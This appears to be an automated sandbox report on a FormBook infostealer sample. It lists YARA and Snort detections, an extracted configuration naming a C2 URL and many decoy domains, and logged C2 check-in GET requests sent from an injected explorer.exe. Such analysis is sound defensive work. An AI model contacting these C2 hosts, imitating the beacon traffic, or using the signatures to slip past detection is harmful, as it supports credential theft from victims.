3.0.1D4l9eR0W4.exe.400000.4.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.1D4l9eR0W4.exe.400000.4.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
0.2.1D4l9eR0W4.exe.3321b58.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
3.2.1D4l9eR0W4.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.1D4l9eR0W4.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.1D4l9eR0W4.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
3.0.1D4l9eR0W4.exe.400000.6.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.0.1D4l9eR0W4.exe.400000.6.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.1D4l9eR0W4.exe.400000.6.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x139c88:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13a022:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x162aa8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x162e42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x145d35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16eb55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x145821:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16e641:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x145e37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16ec57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x145faf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x16edcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13aa3a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x16385a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x144a9c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x16d8bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x13b7b2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1645d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x14b227:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x174047:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x14c2ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x148159:$sqlite3step: 68 34 1C 7B E1 0x14826c:$sqlite3step: 68 34 1C 7B E1 0x170f79:$sqlite3step: 68 34 1C 7B E1 0x17108c:$sqlite3step: 68 34 1C 7B E1 0x148188:$sqlite3text: 68 38 2A 90 C5 0x1482ad:$sqlite3text: 68 38 2A 90 C5 0x170fa8:$sqlite3text: 68 38 2A 90 C5 0x1710cd:$sqlite3text: 68 38 2A 90 C5 0x14819b:$sqlite3blob: 68 53 D8 7F 8C 0x1482c3:$sqlite3blob: 68 53 D8 7F 8C 0x170fbb:$sqlite3blob: 68 53 D8 7F 8C 0x1710e3:$sqlite3blob: 68 53 D8 7F 8C
0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1912a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x191642:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1ba0c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1ba462:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x19d355:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1c6175:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x19ce41:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1c5c61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x19d457:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1c6277:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x19d5cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1c63ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x19205a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1bae7a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x19c0bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1c4edc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x192dd2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1bbbf2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a2847:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1cb667:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a38ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x19f779:$sqlite3step: 68 34 1C 7B E1 0x19f88c:$sqlite3step: 68 34 1C 7B E1 0x1c8599:$sqlite3step: 68 34 1C 7B E1 0x1c86ac:$sqlite3step: 68 34 1C 7B E1 0x19f7a8:$sqlite3text: 68 38 2A 90 C5 0x19f8cd:$sqlite3text: 68 38 2A 90 C5 0x1c85c8:$sqlite3text: 68 38 2A 90 C5 0x1c86ed:$sqlite3text: 68 38 2A 90 C5 0x19f7bb:$sqlite3blob: 68 53 D8 7F 8C 0x19f8e3:$sqlite3blob: 68 53 D8 7F 8C 0x1c85db:$sqlite3blob: 68 53 D8 7F 8C 0x1c8703:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 23 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.scion-go-getter.com/mwev/"], "decoy": ["9linefarms.com", "meadow-spring.com", "texascountrycharts.com", "chinatowndeliver.com", "grindsword.com", "thegurusigavebirthto.com", "rip-online.com", "lm-safe-keepingtoyof6.xyz", "plumbtechconsulting.com", "jgoerlach.com", "inbloomsolutions.com", "foxandmew.com", "tikomobile.store", "waybunch.com", "thepatriottutor.com", "qask.top", "pharmacylinked.com", "ishii-miona.com", "sugarandrocks.com", "anabolenpower.net", "my9m.com", "ywboxiong.xyz", "primetire.net", "yshxdys.com", "royallecleaning.com", "xtrategit.com", "almashrabia.net", "bundlezandco.com", "sandman.network", "vinhomes-grand-park.com", "jbarecipes.com", "squareleatherbox.net", "breathechurch.digital", "wodemcil.com", "carthy.foundation", "galimfish.com", "reflectbag.com", "lheteclase.quest", "yourvirtualevent.services", "custercountycritique.com", "liyahgadgets.com", "sweetascaramelllc.com", "lzgirlz.com", "flydubaime.com", "aanhanger-verhuur.com", "schooldiry.com", "theroadtorodriguez.com", "mrteez.club", "gxystgs.com", "runz.online", "kometbux.com", "mintyhelper.com", "bestinvest-4u.com", "bjxxc.com", "e-readertnpasumo5.xyz", "experimentwithoutlimits.com", "21yingyang.com", "recbi56ni.com", "tabulose-milfs-live.com", "uglyatoz.com", "websitessample.com", "gogopficg.xyz", "fourthandwhiteoak.com", "fulvousemollientplanet.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: 1D4l9eR0W4.exe	Virustotal: Detection: 25%			Perma Link
Source: 1D4l9eR0W4.exe	ReversingLabs: Detection: 24%

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.1D4l9eR0W4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.1D4l9eR0W4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, type: MEMORY

Source: 3.0.1D4l9eR0W4.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.1D4l9eR0W4.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.1D4l9eR0W4.exe.400000.8.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.1D4l9eR0W4.exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: 1D4l9eR0W4.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 1D4l9eR0W4.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: 1D4l9eR0W4.exe, 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, 1D4l9eR0W4.exe, 00000003.00000002.714005352.000000000198F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: 1D4l9eR0W4.exe, 1D4l9eR0W4.exe, 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, 1D4l9eR0W4.exe, 00000003.00000002.714005352.000000000198F000.00000040.00000001.sdmp, wlanext.exe, wlanext.exe, 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdb source: 1D4l9eR0W4.exe, 00000003.00000002.714332060.0000000001BB0000.00000040.00020000.sdmp
Source:	Binary string: wlanext.pdbGCTL source: 1D4l9eR0W4.exe, 00000003.00000002.714332060.0000000001BB0000.00000040.00020000.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49816 -> 147.255.129.44:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49816 -> 147.255.129.44:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49816 -> 147.255.129.44:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49834 -> 15.197.142.173:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49834 -> 15.197.142.173:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49834 -> 15.197.142.173:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49857 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49857 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49857 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49909 -> 43.132.183.85:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49909 -> 43.132.183.85:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49909 -> 43.132.183.85:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 147.255.129.44 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.143.147.58 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 142.250.203.115 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 43.132.183.85 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.fulvousemollientplanet.com
Source: C:\Windows\explorer.exe	Domain query: www.rip-online.com
Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 87.236.16.208 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.scion-go-getter.com
Source: C:\Windows\explorer.exe	Domain query: www.sandman.network
Source: C:\Windows\explorer.exe	Domain query: www.foxandmew.com
Source: C:\Windows\explorer.exe	Domain query: www.royallecleaning.com
Source: C:\Windows\explorer.exe	Domain query: www.websitessample.com
Source: C:\Windows\explorer.exe	Domain query: www.experimentwithoutlimits.com
Source: C:\Windows\explorer.exe	Domain query: www.21yingyang.com
Source: C:\Windows\explorer.exe	Domain query: www.9linefarms.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.209.150.94 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.tikomobile.store
Source: C:\Windows\explorer.exe	Domain query: www.texascountrycharts.com
Source: C:\Windows\explorer.exe	Network Connect: 107.164.242.49 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.scion-go-getter.com/mwev/

Source: Joe Sandbox View	ASN Name: LEASEWEB-USA-LAX-11US LEASEWEB-USA-LAX-11US
Source: Joe Sandbox View	ASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS

Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=HsmrIALTvXRwIzSnf5nMI/V00TunQUINtH1bLOqGnVursL/6Yec02BWx+TEJbBuPuFeE&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.royallecleaning.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=Y+Hyy1N7e+ROxQ1BzGerXtl/+e9k+2VYdpmZeNGMnmnYwBGoq47Ntyx8TFdOC4/xH+hS&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.scion-go-getter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=iTGszEHgBfgYRglEf8qTe/0GehEi8eYY5QDShU32F6t0wDyeZFMPJI0cijyvgJ5fvuvy&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.21yingyang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=muoWufO8p6lksAUPj07m8fqHwDrNKoj9M2hBle0NDwQN4kTZYCe/nJ8SwFL4fqBvjDWp&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.texascountrycharts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=/zd6oxG+H6qci+O+cHlZDp/zFP0nYcFn0YDhkjhJJtSXAtrcRYu0trJUidLUZZla0YBM&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.tikomobile.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=vthKUgsgoRJ92n81Fuh07g/ARRJh8nN5iXUIpLSVgoOHRdB6AKBPErPncdrss3E6nFAH&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.fulvousemollientplanet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=wD7IX5djK39N0mXOoKckCLddnCt/+mP/xVLK1b09pQyAIyzBpLPKZ8m7O34kMZ4xQV6J&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.experimentwithoutlimits.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=IXYNpvQ1BiZ44tShy9SgvoX4c9kgPxO5K/+6kCom7tZxGdFtiZvct/5RRpjh/yF5dNln&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.websitessample.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=rc6cG9leRruTx/YFamCczYYGme6fHdvMbIxv+wAuDzmHDYSO236DISOvOLkKOKiYq/4R&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.foxandmew.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=IjrmxmCSNg9SW3Y0DfjHEVuIkvJ5tkiLJE48G3emnLXjviiyyOAbNkhdp+PdSxIUf+MM&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.9linefarms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=4s7fstVSzLCadPpci11R7qAZUnePXrmWLsX7/7GiC0yrg0b/n74rqRMRm0/pECdGagYy&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.rip-online.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 43.132.183.85 43.132.183.85

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 02 Dec 2021 19:00:13 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be73d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Nginx Microsoft-HTTPAPI/2.0X-Powered-By: NginxDate: Thu, 02 Dec 2021 19:00:25 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Thu, 02 Dec 2021 19:00:35 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Thu, 02 Dec 2021 19:00:41 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 287Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 77 65 76 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 69 6b 6f 6d 6f 62 69 6c 65 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /mwev/ was not found on this server.</p><hr><address>Apache/2.4.10 (Unix) Server at www.tikomobile.store Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 02 Dec 2021 19:00:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: -1X-Dc: gcp-europe-west1X-Request-ID: 1172709a-00f8-4954-b923-2ab5922ac1c1X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6b76cccebf534ebc-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 